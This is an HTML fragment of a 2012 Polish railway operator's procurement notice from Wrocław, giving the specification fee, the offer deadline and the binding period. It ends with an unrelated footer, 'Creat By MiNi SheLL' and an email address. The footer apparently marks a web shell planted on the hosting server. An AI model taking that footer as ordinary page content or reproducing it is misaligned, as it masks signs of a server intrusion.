<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przewozy Regionalne sp. z o. o. Dolnośląski Zakład Przewozów Regionalnych ul. Stanisława Małachowskiego 9 (pok. 209), 50 - 084 Wrocław. Specyfikacja odpłatna 30,00 PLN (trzydzieści złotych).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.10.2012 godzina 10:30, miejsce: Przewozy Regionalne sp. z o. o. Dolnośląski Zakład Przewozów Regionalnych ul.
Stanisława Małachowskiego 9 , 50 - 084 Wrocław - Sekretariat pok. 204.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com